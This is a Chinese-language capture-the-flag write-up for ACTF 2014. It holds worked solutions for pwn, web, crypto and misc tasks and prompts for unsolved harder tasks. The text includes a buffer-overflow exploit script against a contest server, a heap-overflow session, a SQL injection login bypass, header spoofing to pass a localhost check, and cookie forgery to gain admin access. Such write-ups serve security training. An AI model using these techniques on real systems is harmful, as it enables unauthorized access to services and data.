REVERSE 0 RE?
说好的逆向题呢?
出题人还没吃早饭呢,你们急什么。出门左转,乖乖做Web题,OK不?
解题方法:
此题卖萌。“OK不?”“ OK!”
FLAG:
OK
CRYPTO 100 古老
本题flag不在ACTF{}中。
oivqmqgn, yja vibem naarn yi yxbo sqnyab yjqo q zixuea is gaqbn qdi. ykra jqn zira yi baseazy yjqy qeni ko yja ujbqzw rqdqhkoa. yjkn kn vjqy yja uquab saam kn qpixy: gix nxprky q uquab, va backav ky qom ky dayn uxpeknjam. oi oaam yi vqky q rioyj ib yvi xoyke gix naa gixb qbykzea ko yja oafy ujbqzw knnxa, vjao yja ykra jqn zira, va'ee mazkma yi zirukea q oav knnxa sbir yja qbykzean yjqy jqca paao nxprkyyam. yjqy'n pqnkzqeeg ky. qom dbqp gix seqd jaba, zbguyiiiniziieqrkbkdjy?
解题方法:
nowadays, the world seems to turn faster than a couple of years ago. time has come to reflect that also in the phraes magazine. this is what the paper feed is about: you submit a paper, we review it and it gets published. no need to wait a month or two until you see your article in the next phraes issue, when the time has come, we'll decide to compile a new issue from the articles that have been submitted. that's basically it. and grab you flag here, cryptooosocoolamiright?
FLAG:
cryptooosocoolamiright
EXPLOIT 100 餐前甜点
nc 218.2.197.236 2009
crypto200.tar.gz
下载链接:http://ctf.zjuisa.org/downloads/pwn100.b0aaaddb42c9569ef8a2c4b7a2c9ee18
解题方法:
用IDA打开,反编译得到main和game函数:
1 char *__cdecl main() 2 { 3 char *result; // eax@1 4 int v1; // [sp+1Ch] [bp-84h]@1 5 int (*v2)(void); // [sp+9Ch] [bp-4h]@1 6 v2 = 0; 7 puts("== Welcome to PWWWWWWWWN world! ==\n"); 8 fflush(stdout); 9 result = gets((char *)&v1); 10 if ( v2 ) 11 { 12 puts("You are on the right way."); 13 fflush(stdout); 14 result = (char *)v2(); 15 } 16 return result; 17 } 18 19 int __cdecl game() 20 { 21 int result; // eax@3 22 FILE *stream; // [sp+1Ch] [bp-Ch]@1 23 puts("Flag, gei ni yo"); 24 stream = fopen("/home/pwn/flag.txt", "r"); 25 while ( 1 ) 26 { 27 result = fgetc(stream); 28 if ( (_BYTE)result == -1 ) 29 break; 30 putchar((char)result); 31 } 32 return result; 33 }
其中game函数可以打印出flag,函数入口为0x0804855c。
在main函数里看到可以利用gets溢出v1覆盖v2从而执行if分支调用v2,v1长128个字符,在后面接上game的地址,注意call指令地址要倒序(栽在这上面好久。。。),用python:
1 import socket 2 sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 3 sock.connect(('218.2.197.236', 2009)) 4 print sock.recv(1024) 5 sock.send('\xFF' * 128 + '\x5c\x85\x04\x08' + '\n') 6 print sock.recv(1024) 7 sock.close()
FLAG:
ACTF{This_is_an_easy_one_you_have_a_long_w4y_2_go}
MISC 100 社(song)工(fen)
听说参加ACTF的屌丝都喜欢上贴吧:)
解题方法:
此题送分,直接在百度贴吧搜素ACTF,可以找到http://tieba.baidu.com/p/2960754182帖子,复制flag:ACTF{WEL0VECTF_SDOIFJDF}
后来有好多在ACTF发捣乱贴的误导别人,哎~
FLAG:
ACTF{WEL0VECTF_SDOIFJDF}
WEB 100 flag之路
少年,不来一发么。http://218.2.197.236:2005/index.php
解题方法:
打开http://218.2.197.236:2005/index.php,就一句话:
Can you GET the way to flag?
查源码:
1 <html> 2 <link rel="stylesheet" type="text/css" href="style.css"> 3 <br><br><br><br><br><br><br> 4 Can you GET the way to flag? 5 </html> 6 <!--way = "H4ck_F0r_Fun!GoGoGo!" -->
看到一句注释way="H4ck_F0r_Fun!GoGoGo!",试一下,嗯,果然不是flag。
再看这句话,大写GET?,必有猫腻,HTTP的GET提交方式?
试下http://218.2.197.236:2005/index.php?way=H4ck_F0r_Fun!GoGoGo!
提交后,转到http://218.2.197.236:2005/322ad17d5b5fb56a810d9a295ffb5a8c.php
还是一句话:“flag can only access in local machine! ”,查源码无果。只能本地访问,首先想到反向代理,但是怎么实现呢?然后就一直卡这了。
后来根据大牛们的说法,添加HTTP请求头X-Forwarded-For:127.0.0.1即可,重新提交,获得flag。
1 >>> import httplib 2 >>> con=httplib.HTTPConnection('218.2.197.236',2005) 3 >>> con.request('GET','//322ad17d5b5fb56a810d9a295ffb5a8c.php','',{'X-Forwarded-For':'127.0.0.1'}) 4 >>> res=con.getresponse() 5 >>> data=res.read() 6 >>> print data 7 <link rel="stylesheet" type="text/css" href="style.css"> 8 Here is your flag: ACTF{I_love_H4ck_and_I_love_F4ck}<br><br><br><br><br><br><br><br> 9 flag can only access in local machine! 10 <br>
FLAG:
ACTF{I_love_H4ck_and_I_love_F4ck}
CRYPTO 200 买不到票的怨念
买不到TI4的门票觉得人生好灰暗。。crypto200.tar.gz
下载链接:http://ctf.zjuisa.org/downloads/crypto200.tar.gz.d656ad805747d212e4b49a74a0b4e8c7
解题方法:
下载下来解压出4个文件:encryptor.py,msg01,msg01.enc,msg02.enc
msg01是一句话:Welcome to AAA capture the flag you folks
msg01.enc,msg02.enc都是乱码
encryptor.py是个加密程序:
1 f = open('msg01', 'rb').read() 2 g = open('msg01.enc', 'wb') 3 4 key = 'key' 5 c = '' 6 t = chr(0) 7 i = 0 8 9 for p in f: 10 c = chr(( ord(p) + (ord(key[i % len(key)]) ^ ord(t)) + i**i ) & 0xff) 11 t = p 12 i += 1 13 g.write(c) 14 15 g.close()
运行一下试试,发现msg01加密结果和题给的msg01.enc不一样,看代码估计是密钥key不一样的缘故,那么下面重点就是找key了,因为已知明文msg01和密文msg01.enc,写出下面代码:
1 f = open('msg01', 'rb').read() 2 g = open('msg01.enc', 'rb').read() 3 k = open('key','wb') 4 5 key = '' 6 t = chr(0) 7 i = 0 8 9 for p in f: 10 key = chr((ord(g[i]) - i**i - ord(p)) & 0xff ^ ord(t)) 11 t = p 12 i +=1 13 k.write(key) 14 k.close()
运行得key:DoNotTryToGuessWhatDoesD3AdCa7ThinkOfDoNo
后面DoNo开始从头循环了,取前面一大串:DoNotTryToGuessWhatDoesD3AdCa7ThinkOf作为最后的key,写出解密代码:
1 f = open('msg02', 'wb') 2 g = open('msg02.enc', 'rb').read() 3 4 key='DoNotTryToGuessWhatDoesD3AdCa7ThinkOf' 5 c = '' 6 t = chr(0) 7 i = 0 8 9 for p in g: 10 c = chr(ord(p) - i**i - (ord(key[i % len(key)]) ^ ord(t)) & 0xff) 11 t = c 12 i += 1 13 f.write(c) 14 f.close()
运行得到结果:
High demand! No matches...
Search again for these tickets (a fan may have let them go) or change quantity/ticket type.
Get This damn fl4g plz
ACTF{why_can_not_I_buy_a_TI4_ticket_It_it_so_terrible!!!!!!!!!!}
FLAG:
ACTF{why_can_not_I_buy_a_TI4_ticket_It_it_so_terrible!!!!!!!!!!}
EXPOLIT 200 杀猪吃肉
nc 218.2.197.236 2010
crypto200.tar.gz
下载链接:http://ctf.zjuisa.org/downloads/pwn200.676407435f65a98b11f7a3398491e04b
解题方法:
下载文件用IDA打开,发现是64位的,反编译插件不支持,只能抠汇编了晕。。。
从main函数开始看:
1 .text:0000000000400A1A public main 2 3 .text:0000000000400A1A main: 4 5 .text:0000000000400A1A push rbp 6 7 .text:0000000000400A1B mov rbp, rsp 8 9 .text:0000000000400A1E sub rsp, 0A0h 10 11 .text:0000000000400A25 mov [rbp-94h], edi 12 13 .text:0000000000400A2B mov [rbp-0A0h], rsi 14 15 .text:0000000000400A32 mov edi, offset a_________ ; " _____ _ _ "... 16 17 .text:0000000000400A37 call _puts 18 19 .text:0000000000400A3C mov edi, offset a___ ; "/ ___|| | | | |"... 20 21 .text:0000000000400A41 call _puts 22 23 .text:0000000000400A46 mov edi, offset a______________ ; "\\ `--. | | __ _ _ _ __ _ | |__ |"... 24 25 .text:0000000000400A4B call _puts 26 27 .text:0000000000400A50 mov edi, offset a__________ ; " `--. \\| | / _` || | | | / _` || '_ \\ |"... 28 29 .text:0000000000400A55 call _puts 30 31 .text:0000000000400A5A mov edi, offset a________ ; "/\\__/ /| || (_| || |_| || (_| || | | ||"... 32 33 .text:0000000000400A5F call _puts 34 35 .text:0000000000400A64 mov edi, offset a_____________0 ; "\\____/ |_| \\__,_| \\__,_| \\__, ||_| |_| "... 36 37 .text:0000000000400A69 call _puts 38 39 .text:0000000000400A6E mov edi, offset a__ ; " __/ | "... 40 41 .text:0000000000400A73 call _puts 42 43 .text:0000000000400A78 mov edi, offset a____0 ; " |___/ "... 44 45 .text:0000000000400A7D call _puts 46 47 .text:0000000000400A82 mov rax, cs:stdout@@GLIBC_2_2_5 48 49 .text:0000000000400A89 mov rdi, rax 50 51 .text:0000000000400A8C call _fflush 52 53 .text:0000000000400A91 jmp short loc_400A94 54 55 .text:0000000000400A93 ; --------------------------------------------------------------------------- 56 57 .text:0000000000400A93 58 59 .text:0000000000400A93 loc_400A93: ; CODE XREF: .text:0000000000400BE2j 60 61 .text:0000000000400A93 ; .text:0000000000400C50j ... 62 63 .text:0000000000400A93 nop 64 65 .text:0000000000400A94 66 67 .text:0000000000400A94 loc_400A94: ; CODE XREF: .text:0000000000400A91j 68 69 .text:0000000000400A94 mov rdx, cs:service 70 71 .text:0000000000400A9B mov rax, cs:auth 72 73 .text:0000000000400AA2 mov rsi, rax 74 75 .text:0000000000400AA5 mov edi, offset aKillpigPFeedpi ; "[ killPig = %p, feedPig = %p ]\n" 76 77 .text:0000000000400AAA mov eax, 0 78 79 .text:0000000000400AAF call _printf 80 81 .text:0000000000400AB4 mov rax, cs:stdout@@GLIBC_2_2_5 82 83 .text:0000000000400ABB mov rdi, rax 84 85 .text:0000000000400ABE call _fflush 86 87 .text:0000000000400AC3 mov rdx, cs:stdin@@GLIBC_2_2_5 88 89 .text:0000000000400ACA lea rax, [rbp-90h] 90 91 .text:0000000000400AD1 mov esi, 80h 92 93 .text:0000000000400AD6 mov rdi, rax 94 95 .text:0000000000400AD9 call _fgets 96 97 .text:0000000000400ADE test rax, rax 98 99 .text:0000000000400AE1 jz loc_400C5A ; X 100 101 .text:0000000000400AE7 lea rax, [rbp-90h] 102 103 .text:0000000000400AEE mov edx, 8 104 105 .text:0000000000400AF3 mov esi, offset aKillpig ; "killPig " 106 107 .text:0000000000400AF8 mov rdi, rax 108 109 .text:0000000000400AFB call _strncmp 110 111 .text:0000000000400B00 test eax, eax 112 113 .text:0000000000400B02 jnz short loc_400B64 114 115 .text:0000000000400B04 mov edi, 8 116 117 .text:0000000000400B09 call _malloc 118 119 .text:0000000000400B0E mov cs:auth, rax 120 121 .text:0000000000400B15 mov rax, cs:auth 122 123 .text:0000000000400B1C mov edx, 8 124 125 .text:0000000000400B21 mov esi, 0 126 127 .text:0000000000400B26 mov rdi, rax 128 129 .text:0000000000400B29 call _memset 130 131 .text:0000000000400B2E lea rax, [rbp-90h] 132 133 .text:0000000000400B35 add rax, 8 134 135 .text:0000000000400B39 mov rdi, rax 136 137 .text:0000000000400B3C call _strlen 138 139 .text:0000000000400B41 cmp rax, 1Eh 140 141 .text:0000000000400B45 ja short loc_400B64 142 143 .text:0000000000400B47 mov rax, cs:auth 144 145 .text:0000000000400B4E lea rdx, [rbp-90h] 146 147 .text:0000000000400B55 add rdx, 8 148 149 .text:0000000000400B59 mov rsi, rdx 150 151 .text:0000000000400B5C mov rdi, rax 152 153 .text:0000000000400B5F call _strcpy 154 155 .text:0000000000400B64 156 157 .text:0000000000400B64 loc_400B64: ; CODE XREF: .text:0000000000400B02j 158 159 .text:0000000000400B64 ; .text:0000000000400B45j 160 161 .text:0000000000400B64 lea rax, [rbp-90h] 162 163 .text:0000000000400B6B mov edx, 5 164 165 .text:0000000000400B70 mov esi, offset aReset ; "reset" 166 167 .text:0000000000400B75 mov rdi, rax 168 169 .text:0000000000400B78 call _strncmp 170 171 .text:0000000000400B7D test eax, eax 172 173 .text:0000000000400B7F jnz short loc_400B90 174 175 .text:0000000000400B81 mov rax, cs:auth 176 177 .text:0000000000400B88 mov rdi, rax 178 179 .text:0000000000400B8B call _free 180 181 .text:0000000000400B90 182 183 .text:0000000000400B90 loc_400B90: ; CODE XREF: .text:0000000000400B7Fj 184 185 .text:0000000000400B90 lea rax, [rbp-90h] 186 187 .text:0000000000400B97 mov edx, 7 188 189 .text:0000000000400B9C mov esi, offset aFeedpig ; "feedPig" 190 191 .text:0000000000400BA1 mov rdi, rax 192 193 .text:0000000000400BA4 call _strncmp 194 195 .text:0000000000400BA9 test eax, eax 196 197 .text:0000000000400BAB jnz short loc_400BC7 198 199 .text:0000000000400BAD lea rax, [rbp-90h] 200 201 .text:0000000000400BB4 add rax, 8 202 203 .text:0000000000400BB8 mov rdi, rax 204 205 .text:0000000000400BBB call _strdup 206 207 .text:0000000000400BC0 mov cs:service, rax 208 209 .text:0000000000400BC7 210 211 .text:0000000000400BC7 loc_400BC7: ; CODE XREF: .text:0000000000400BABj 212 213 .text:0000000000400BC7 lea rax, [rbp-90h] 214 215 .text:0000000000400BCE mov edx, 5 216 217 .text:0000000000400BD3 mov esi, offset aEatit ; "eatIt" 218 219 .text:0000000000400BD8 mov rdi, rax 220 221 .text:0000000000400BDB call _strncmp 222 223 .text:0000000000400BE0 test eax, eax 224 225 .text:0000000000400BE2 jnz loc_400A93 226 227 .text:0000000000400BE8 mov rax, cs:auth 228 229 .text:0000000000400BEF mov eax, [rax+20h] 230 231 .text:0000000000400BF2 test eax, eax 232 233 .text:0000000000400BF4 jz short loc_400C37 234 235 .text:0000000000400BF6 mov edi, offset aFlagGeiNiYooo ; "Flag, gei ni yooo" 236 237 .text:0000000000400BFB call _puts 238 239 .text:0000000000400C00 mov esi, offset aR ; "r" 240 241 .text:0000000000400C05 mov edi, offset aHomePwnFlag_tx ; "/home/pwn/flag.txt" 242 243 .text:0000000000400C0A call _fopen 244 245 .text:0000000000400C0F mov [rbp-8], rax 246 247 .text:0000000000400C13 jmp short loc_400C20 248 249 .text:0000000000400C15 ; --------------------------------------------------------------------------- 250 251 .text:0000000000400C15 252 253 .text:0000000000400C15 loc_400C15: ; CODE XREF: .text:0000000000400C33j 254 255 .text:0000000000400C15 movsx eax, byte ptr [rbp-9] 256 257 .text:0000000000400C19 mov edi, eax 258 259 .text:0000000000400C1B call _putchar 260 261 .text:0000000000400C20 262 263 .text:0000000000400C20 loc_400C20: ; CODE XREF: .text:0000000000400C13j 264 265 .text:0000000000400C20 mov rax, [rbp-8] 266 267 .text:0000000000400C24 mov rdi, rax 268 269 .text:0000000000400C27 call _fgetc 270 271 .text:0000000000400C2C mov [rbp-9], al 272 273 .text:0000000000400C2F cmp byte ptr [rbp-9], 0FFh 274 275 .text:0000000000400C33 jnz short loc_400C15 276 277 .text:0000000000400C35 jmp short loc_400C55 278 279 .text:0000000000400C37 ; --------------------------------------------------------------------------- 280 281 .text:0000000000400C37 282 283 .text:0000000000400C37 loc_400C37: ; CODE XREF: .text:0000000000400BF4j 284 285 .text:0000000000400C37 mov edi, offset aWhoAreYouZhuto ; "Who are you! zhutou bu shi ni xiang chi"... 286 287 .text:0000000000400C3C call _puts 288 289 .text:0000000000400C41 mov rax, cs:stdout@@GLIBC_2_2_5 290 291 .text:0000000000400C48 mov rdi, rax 292 293 .text:0000000000400C4B call _fflush
总体逻辑是顺序依次判断输入字符串与"killPig "(有空格)、"reset"、"feedPig"、"eatIt"是否一致并跳转到相应的操作上。
第233行看到一个关键跳转:jz short loc_400C37,需要eax不为0才能执行下面打印flag的代码。
而eax是.bss段auth+20H开始的值,这段内存由提交"killPig "后分配并置0,再通过提交"feedPig"+过长字符串从service溢出覆盖auth,最后提交"eatIt"打印flag:
C:\nc11nt>nc 218.2.197.236 2010 _____ _ _ _ _ / ___|| | | | | | | | \ `--. | | __ _ _ _ __ _ | |__ | |_ ___ _ __ | |__ ___ _ _ ___ ___ `--. \| | / _` || | | | / _` || '_ \ | __| / _ \| '__|| '_ \ / _ \ | | | |/ __ | / _ \ /\__/ /| || (_| || |_| || (_| || | | || |_ | __/| | | | | || (_) || |_| |\__ \| __/ \____/ |_| \__,_| \__,_| \__, ||_| |_| \__| \___||_| |_| |_| \___/ \__,_||___ / \___| __/ | |___/ [ killPig = (nil), feedPig = (nil) ] killPig [ killPig = 0x2170010, feedPig = (nil) ] feedPigaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaa [ killPig = 0x2170010, feedPig = 0x2170030 ] [ killPig = 0x2170010, feedPig = 0x2170030 ] eatIt Flag, gei ni yooo ACTF{Why_not_try_zio_to_Pwwwwwwwwwn_Everything} [ killPig = 0x2170010, feedPig = 0x2170030 ]
FLAG:
ACTF{Why_not_try_zio_to_Pwwwwwwwwwn_Everything}
WEB 200 讨厌的管理员
FLAG在admin的手里!http://218.2.197.236:2005/web200/index.php
解题方法:
打开http://218.2.197.236:2005/web200/index.php是个登陆界面,标准注入:' or '1'='1
提示flag在ae6032eeeb5cedc1555940983435335b.php
打开http://218.2.197.236:2005/web200/ae6032eeeb5cedc1555940983435335b.php
一句:wrong place man! key is not here.
Are you kidding me!果然是忽悠人的。
wireshark抓原报文:
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Sun, 06 Apr 2014 14:09:09 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.10
realkeyisin: beda47ac34562108ee149767c61cb0ec.php
7d
<link rel="stylesheet" type="text/css" href="style.css">
<br><br><br><br><br><br><br><br>
wrong place man! key is not here.
看到有个realkeyisin:beda47ac34562108ee149767c61cb0ec.php
打开http://218.2.197.236:2005//web200/beda47ac34562108ee149767c61cb0ec.php
一句话:You find it! But only admin can see the flag...can you see it?
又是管理员什么玩意的,到这我是看不懂了,听说加个Cookie:admin=1就行?
GET http://218.2.197.236:2005//web200/beda47ac34562108ee149767c61cb0ec.php HTTP/1.1
Host: 218.2.197.236:2005
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.154 Safari/537.36
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: admin=1
这题纯属看缘分。
1 >>> import httplib 2 >>> con=httplib.HTTPConnection('218.2.197.236',2005) 3 >>> con.request('GET','/web200/beda47ac34562108ee149767c61cb0ec.php','',{'Cookie':'admin=1'}) 4 >>> res=con.getresponse() 5 >>> data=res.read() 6 >>> print data 7 <link rel="stylesheet" type="text/css" href="style.css"> 8 9 <br><br><br><br><br><br><br><br> 10 11 You find it! But only admin can see the flag...can you see it?<br> 12 13 flag:ACTF{I_donot_need_sex_life_fxxks_me_everyday} 14 >>>
FLAG:
ACTF{I_donot_need_sex_life_fxxks_me_everyday}
好了,我这水平也就能做做100、200的题,下面就坐等大神们的write up了。
MISC 300 S4ndb0x
http://218.2.197.236:2015
MISC 300 抓(zhua)包(zhu)
猪头在自习室用手机的流量被全部抓到了!看看流量里有什么有意思的东西?
链接:http://pan.baidu.com/s/1ntrzThB 密码:cbf2
MISC 300 找(ri)bug(猪)
猪头喜欢上oschina,找死猫要了一个安卓客户端,不过死猫居心叵测在里面留了一个后门。听说猪头在oschina用私信约了一个妹妹,现在给你一个种马的机会,看能不能把猪头约炮的私信偷出来?当然要绕过杀毒哦。
http://218.2.197.236:2007
WEB 300 喵喵喵喵
管理员小陆搭了个服务器,但是好像漏洞蛮多哟。
http://218.2.197.236:2001/index.html
CRYPTO 400 老大哥aay的秘密
老大哥aay给了你一个神秘文件,你看着办吧flag.rar
下载链接:http://ctf.zjuisa.org/downloads/flag.rar.f4cc03f0637d6ac68e5fa230a65a4071
MISC 400 赞助商
你大家快来看赞助商!hidden.png
下载链接:http://ctf.zjuisa.org/downloads/hidden.png.dc1ae8d8f43c52dd53cce50b7b253593
WEB 400 贡丸酱
web300没做出来的话这题做出来的希望不大,你以为你是可爱的贡丸酱么( つ•�ω•�)つ
(贡丸酱到底算不算提示呢)
(web300和web400都不需要使用扫描器)
(本题flag并不是ACTF形式的,你提交的flag中也不需要包含任何形式的括号)
http://218.2.197.236:2003
提示
现在可以公开的情报:
管理员是个很懒的人,他的笔记几乎没有任何废话。
WEB 500 丧心病狂的黑客
管理员小陆搭的服务器被人日穿了(见web300),小陆被boss骂了个狗血淋头。然后boss勒令小陆再搭一遍,小陆在某内网换了个架构(原架构是nginx)又搭了一遍web300的站,修补了部分漏洞。boss和小陆都是那台服务器的用户,这样boss发现小陆又写出漏洞代码就会及时记录在服务器上。
接受挑战,hackers,日穿这台位置未知的内网服务器!!!
(本题和之前的web题有紧密联系!!!)
(部分关键文件每十分钟重置一次!!!)
(本题flag不包含有ACTF字样,不包含有任何括号!!!)
(Drink All The Booze , Hack All The Things!!!)
提示
第一步先确定服务器位置
REVERSE 800 Chaos
Download: http://pan.baidu.com/s/1i3GA4zr
Password: ophk
ATQA (SENS_RES): 00 04
UID (NFCID1): AD EA DC A7
SAK (SEL_RES): 08
请你帮这只死猫计算出 0 扇区的 KeyA 和 3 扇区的 KeyB
Flag = ( Sector_0_KeyA + Sector_3_KeyB ).encode('hex').upper()
提示
exported and non-exported entries can ease your life
Log => Code Path, Google => Document, Server => Secret, Reuse => No More Reverse
REVERSE 800 NonStandard
链接: http://pan.baidu.com/s/1pJO5QeZ 密码: lk1d
写不出 Keygen 都不好意思说自己是搞逆向的
请写出 Keygen 发送至 ACTF.NonStandard@gmail.com,解决“暗桩”有额外加分
提示
看标题
REVERSE 800 Verify
链接: http://pan.baidu.com/s/1GOO3c 密码: 6q9f
提示
RTFM
Over
